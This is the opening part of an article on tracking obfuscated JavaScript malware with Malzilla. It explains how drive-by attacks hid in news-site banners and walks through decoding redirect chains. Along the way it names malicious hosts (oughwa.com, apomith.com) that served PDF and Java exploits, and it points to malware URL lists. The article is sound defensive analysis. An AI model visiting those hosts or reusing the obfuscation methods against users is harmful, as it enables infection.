Tracking down malware
by Daniel Bachfeld
Criminals increasingly attempt to camouflage the traces of their malware on the internet to keep control of a hijacked server for as long as possible. However, their paths can be retraced using special tools to identify the vulnerability the malware intends to exploit to enter a system.
While, in the past, browsers only contracted viruses and trojans via dubious web pages, all that is required today is that users read the morning news on a popular news site. In the most recent incident, browser holes were exploited to install scareware in the advertising banners at German news sites Handelsblatt.de and zeit.de. For this attack, the criminals responsible concealed specially crafted JavaScript code in the banner. This loaded further code in an iFrame that, in turn, pointed to a different page where the Neosploit exploit toolkit finally checked the browser's QuickTime, Java and Adobe Reader plug-ins for various holes.
Criminals use a multi-stage approach to camouflage the true origin of an attack. Firstly, they don't embed plain text links in the web pages or Flash banners they infect, but encode URLs into long character strings which are only decoded at run-time via JavaScript or ActionScript – even the script itself is often encoded. Secondly, malware programmers use multiple detours, leading the browser to the actual malware via jumps to various other pages. All this is designed to complicate tracking and mislead users, website operators and even anti-virus specialists.
Thankfully, there are tools and helpers that can reconstruct more or less intelligible code from a JavaScript segment which is virtually undecipherable to the human eye. This allows us to take up the chase, or at least figure out which holes the attackers attempted to exploit. Tools such as Malzilla and Jode help with manual analysis, while the jsunpack and Wepawet analytical services with their automated facilities support the work of analysts. Let's take a quick look at all four.
Malzilla
The Malzilla tool for Windows helps malware hunters figure out obfuscated JavaScript segments on infected web pages. Once the URL is identified, the tool retrieves and displays the HTML code in question. The authors of viruses generally use two methods to scramble embedded links, malware URLs and other code. A simple way is to encode a URL via base64 or via the Universal Character Set (UCS). Malzilla contains a number of decoders that can unscramble such character strings and make them legible for analysts.
The other method is to use JavaScript and various data to assemble a URL at run-time. However, Malzilla can emulate the execution of JavaScript code and display the respective results. It is not uncommon for virus authors to combine the two methods, so that several rounds in Malzilla may be required to track down the malware.
For first testing, take the URL of an infected web page and enter it into Malzilla's address field. You can find samples for your own experiments at sites such as www.malwaredomainlist.com or www.malwareurl.com. However, the URLs listed on these sites shouldn't be opened in a browser without prior protective measures. Malzilla takes various precautions to prevent the analyst's system from getting infected. For instance, it executes the code using special JavaScript libraries that are unable to impact local resources. An attacker would, therefore, have to exploit a hole in Malzilla to inject a trojan. Nevertheless, it is not advisable to use the same PC both for malware analysis and for online banking – better safe than sorry. An even more preferable approach is to run the tests in a virtual environment such as the free VirtualBox.
The "Get" button calls the entered URL, and Malzilla retrieves the destination's HTML code. This code can be examined for suspicious entries or scripts in a text window. Malzilla conveniently auto-highlights the JavaScript passages contained in the HTML code and sends them to the decoder. The respective code segments can then be viewed in the "Decoder" window, where the "Run Script" button serves for executing the code.
If a script was executed successfully, Malzilla issues the message "Script compiled" and displays the result in the bottom window. Often, this result is a hidden iFrame that was secretly opened in the normal browser window and points to another page, or a JavaScript segment which, in turn, may need to be deciphered. If there is another script, you can simply copy and paste the code from the results window to the decoder window and restart "Run Script" to execute it. If the result is a simple link such as the one shown in our picture, you can enter this URL and start the process over in Malzilla, gradually working your way towards the origin of the attack – in our example, the corresponding page is oughwa.com/in4.php. The script on this page redirects Malzilla's request to the apomith.com server, where the actual exploits are lurking.
Occasionally, Malzilla can't complete the execution of a script because it doesn't support certain JavaScript functions like document.createElement() that may be included – which is the case in the scripts embedded at apomith.com.
At this point, it is either necessary to adapt the JavaScript code and replace the unsupported JavaScript function with a similar, supported function, or to use a different tool such as jsunpack – more about this later.
Malzilla can also partially expose obfuscated code sequences without emulation, using its numerous decoder functions instead. For instance, it can automatically decode segments camouflaged via the escape function and write the result to a file. Malzilla also offers various decoding options that can be tried out manually. How and when to use these functions is demonstrated in many tutorials on the tool's project page.
The segments decoded at apomith.com reveal that the criminals try to infect systems with a PDF exploit as well as a Java exploit. The code shows that they particularly target the users of Internet Explorer, testing whether the Microsoft browser includes the ActiveX control for Adobe Reader and investigating the version of the installed control. To exploit a potential hole in Java, the apomith site downloads the jjj.jar Java archive to the computer and starts it there.
Next: Reading the coffee grounds